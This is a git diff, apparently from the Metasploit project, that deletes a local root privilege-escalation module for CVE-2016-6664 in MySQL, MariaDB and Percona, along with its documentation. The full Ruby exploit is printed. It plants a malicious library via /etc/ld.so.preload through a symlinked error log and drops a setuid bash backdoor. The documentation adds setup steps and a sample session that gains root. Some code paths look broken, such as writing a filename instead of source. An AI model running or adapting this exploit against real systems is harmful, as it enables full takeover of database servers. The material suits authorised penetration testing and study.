diff --git a/data/exploits/CVE-2016-6664/2016-6664.out b/data/exploits/CVE-2016-6664/2016-6664.out deleted file mode 100755 index 7f32e8dde0..0000000000 Binary files a/data/exploits/CVE-2016-6664/2016-6664.out and /dev/null differ diff --git a/documentation/modules/exploit/linux/local/mysql_priv_esc.md b/documentation/modules/exploit/linux/local/mysql_priv_esc.md deleted file mode 100644 index 264890db89..0000000000 --- a/documentation/modules/exploit/linux/local/mysql_priv_esc.md +++ /dev/null @@ -1,127 +0,0 @@ - -## Notes - -This exploit was tested on ubuntu 14 and 16. As it relies on log file location and service restarting, success on other linux distributions depends greatly. - -## Creating A Testing Environment - -There are a few requirements for this module to work: - - 1. mysql must be started by running mysql_safe - 2. the error log must be active - 3. mysql logging through syslog must not enabled - 4. mysql automatic restart must be enabled - - Using Ubuntu 16.04: - - 1. install mariadb - `apt-get -y install mariadb-server` - 2. disable syslog - `sed -i -e "s/syslog/#syslog/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf` - 3. enable error log - `sed -i -e "s/skip_log_error/#skip_log_error/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf` - 4. enable service - `systemctl enable mysql.service` - 5. start service - `systemctl start mysql.service` - -This module has been tested against the following versions of mysql running on Ubuntu 16.04: - - 1. MariaDB 10.0.27 - -On Ubuntu 14.04: - - 1. MySQL 5.5.35 - 2. MariaDB 5.5.52 - -On Debian 8.6 - - 1. MySQL 5.5.53 - -This module was not tested against, but may work against: - - * MySQL - <= 5.5.51 - <= 5.6.32 - <= 5.7.14 - - * MariaDB - <= 5.5.50 - - * Percona Server - < 5.5.51-38.2 - < 5.6.32-78-1 - < 5.7.14-8 - - * Percona XtraDB Cluster - < 5.6.32-25.17 - < 5.7.14-26.17 - < 5.5.41-37.0 - -## Verification Steps - - 1. Start msfconsole - 2. Exploit a box via whatever method - 4. Do: `use exploit/linux/local/mysql_priv_esc` - 5. Do: `set session #` - 6. Do: `set verbose true` - 7. Do: `exploit` - -## Options - - **WritableDir** - - A folder we can write files to. Defaults to /tmp - - **ErrorLog** - - The mysql service error log file. The location of this file is set on the configuration files. Defaults to /var/log/mysql/error.log - - **BackdoorShell** - - The shell that will be launched using elevated privileges. Defaults to /bin/bash - - **COMPILE** - - If we should live compile on the system, or drop pre-created binaries. `Auto` will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` - -## Scenarios - -### Ubuntu 16.04 (with Linux 4.4.0-21-generic) -### MariaDB 10.0.27 (MariaDB-0ubuntu0.16.04.1) - -#### Initial Access - - Use whatever means to get a session back to metaploit ith the mysql account, usually dropping a webshell, connecting back to metaploit and escalate to mysql. - -#### Escalate to root - -msf exploit(mysql_priv_esc) > -[*] Sending stage (36 bytes) to 192.168.205.64 -[*] Command shell session 45 opened (192.168.205.52:443 -> 192.168.205.64:51400) at 2016-11-16 21:44:16 +0000 - -msf exploit(mysql_priv_esc) > set session 45 -session => 45 -msf exploit(mysql_priv_esc) > run - -[+] mysqld_safe is running -[+] The current user is mysql -[*] Checking if gcc are installed -[*] Checking if gcc are installed -[*] Dropping pre-compiled exploit on system -[*] Writing privesclib to /tmp/fYAMgzW5.so -[*] Max line length is 65537 -[*] Writing 8240 bytes in 1 chunks of 19877 bytes (octal-encoded), using printf -[*] Seting up the preload trap -[*] cp /bin/bash /tmp/mysqlrootsh -[*] touch -f /var/log/mysql/error.log; mv /var/log/mysql/error.log /var/log/mysql/error.log.tmp && ln -s /etc/ld.so.preload /var/log/mysql/error.log -[*] kill $(pgrep mysqld) -[*] /bin//sh: 27: kill: Operation not permitted - -[*] Waiting for mysqld to restart... -[*] Executing escalation. -[*] echo /tmp/fYAMgzW5.so > /etc/ld.so.preload -[*] chmod 755 /etc/ld.so.preload -[*] /usr/bin/sudo 2>/dev/null >/dev/null -[*] /tmp/mysqlrootsh -p -c "rm -f /etc/ld.so.preload; rm -f /tmp/fYAMgzW5.so" -[*] /tmp/mysqlrootsh -p -[*] Cleanup done. -[!] This exploit may require manual cleanup of '/tmp/mysqlrootsh' on the target -msf exploit(mysql_priv_esc) > sessions -i 45 -c "id" -[*] Running 'id' on shell session 45 (192.168.205.64) -uid=112(mysql) gid=121(mysql) euid=0(root) groups=121(mysql) diff --git a/modules/exploits/linux/local/mysql_priv_esc.rb b/modules/exploits/linux/local/mysql_priv_esc.rb deleted file mode 100644 index b8f6440d93..0000000000 --- a/modules/exploits/linux/local/mysql_priv_esc.rb +++ /dev/null @@ -1,216 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require "msf/core" - -class MetasploitModule < Msf::Exploit::Local - Rank = GoodRanking - - include Msf::Post::Common - include Msf::Post::File - include Msf::Exploit::EXE - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MySQL / MariaDB / Percona - Root Privilege Escalation', - 'Description' => %q{ - MySQL-based databases including MySQL, MariaDB and Percona are affected - by a privilege escalation vulnerability which can let attackers who have - gained access to mysql system user to further escalate their privileges - to root user allowing them to fully compromise the system. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'x2020 ', # Module - 'Dawid Golunski' # Discovery - ], - 'DisclosureDate' => 'Nov 01 2016', - 'Platform' => [ 'linux'], - 'SessionTypes' => ['shell', 'meterpreter'], - 'Targets' => [ ['Automatic', {}] ], - 'DefaultTarget' => 0, - 'DefaultOptions' => - { - 'DisablePayloadHandler' => true - }, - 'References' => - [ - [ 'EDB', '40679'], - [ 'CVE', '2016-6664'], - [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html'] - ] - )) - register_options( - [ - OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]), - OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), - OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]), - OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) - ], self.class) - end - - def check - - def check_reqs?() - # should have mysqld_safe running - check_command = "if pgrep mysqld; " - check_command << "then echo OK; " - check_command << "fi" - output = cmd_exec(check_command).gsub("\r", '') - vprint_status output - if output['OK'] == 'OK' - vprint_good "mysqld_safe is running" - return true - end - print_error "mysqld process not running" - false - end - - def mysql_user?() - # test for mysql user - mysql = cmd_exec("id | grep -E '(mysql)'") - if not mysql.include?("mysql") - print_error "The current session user (#{mysql}) is not mysql" - return false - end - vprint_good "The current user is mysql" - true - end - - def preload_exists?() - if exists?("/etc/ld.so.preload") - print_error "Found ld.so.preload. Exiting for safety." - return true - end - false - end - - def sudo_exists?() - @sudo = cmd_exec('which sudo') - if @sudo.include?("sudo") - return true - end - false - end - - if check_reqs? and mysql_user? and sudo_exists? - if preload_exists? - return CheckCode::Detected - end - return CheckCode::Appears - end - - CheckCode::Safe - end - - def exploit - - if check != CheckCode::Appears - fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') - end - - # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. - def has_prereqs?() - vprint_status('Checking if gcc is installed') - if target.name == "Ubuntu" - gcc = cmd_exec('which gcc') - if gcc.include?('gcc') - vprint_good('gcc is installed') - else - print_error('gcc is not installed. Compiling will fail.') - end - return gcc.include?('gcc') - else - return false - end - end - - compile = has_prereqs? - if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' - if has_prereqs?() - compile = true - vprint_status('Live compiling exploit on system') - else - vprint_status('Dropping pre-compiled exploit on system') - end - end - - # build file names and locations - privesclib_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".so" - privescsrc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".c" - pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) - payload_path = datastore["WritableDir"] + "/" + rand_text_alpha(8) - backdoorsh = datastore["BackdoorShell"] - backdoorpath = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) - error_log_file = datastore["ErrorLog"] - - # setup the files - rm_f pwn_file - if compile - vprint_status "Writing pwn source to #{privescsrc_file}" - rm_f privescsrc_file - write_file(privescsrc_file, privesclib_file) - cmd_exec("gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl") - register_file_for_cleanup(privescsrc_file) - else - # privesclib.so file - path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-6664', '2016-6664.out') - fd = ::File.open( path, "rb") - privesclib = fd.read(fd.stat.size) - fd.close - vprint_status "Writing privesclib to #{privesclib_file}" - backdoorpath = "/tmp/mysqlrootsh" # hardcoded into privesclib.so - write_file(privesclib_file, privesclib) - end - register_file_for_cleanup(backdoorpath) - register_file_for_cleanup(privesclib_file) - - # the actual pwning - def do_pwn(privesclib_file, suidbin, backdoorpath, payload_path) - print_status "Executing escalation." - do_cmd_exec("echo #{privesclib_file} > /etc/ld.so.preload") - do_cmd_exec("chmod 755 /etc/ld.so.preload") - do_cmd_exec("#{suidbin} 2>/dev/null >/dev/null") - do_cmd_exec("#{backdoorpath} -p -c \"rm -f /etc/ld.so.preload; rm -f #{privesclib_file}\"") - do_cmd_exec("#{backdoorpath} -p") - end - - # reset system state - def do_cleanup(error_log_file) - cmd_exec("rm -f #{error_log_file}") - cmd_exec("mv -f #{error_log_file}.tmp #{error_log_file}") - cmd_exec("if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload; fi") - vprint_status "Cleanup done." - end - - # util cmd_exec with verbose print - def do_cmd_exec(cmd) - vprint_status cmd - r = cmd_exec(cmd) - if r != "" - print_status r - end - end - - # initial setup for pwning - vprint_status "Seting up the preload trap" - do_cmd_exec("cp #{backdoorsh} #{backdoorpath}") - do_cmd_exec("touch -f #{error_log_file}; mv #{error_log_file} #{error_log_file}.tmp && ln -s /etc/ld.so.preload #{error_log_file}") - do_cmd_exec("kill $(pgrep mysqld)") - - # wait for restart - print_status "Waiting for mysqld to restart..." - cmd_exec("while :; do { sleep 0.1; if [ -f /etc/ld.so.preload ]; then { echo #{privesclib_file} > /etc/ld.so.preload; rm -f #{error_log_file}; break; } fi } done", nil, 125) - - # pwn the system - do_pwn(privesclib_file, @sudo, backdoorpath, payload_path) - - # cleanup the mess - do_cleanup(error_log_file) - - end -end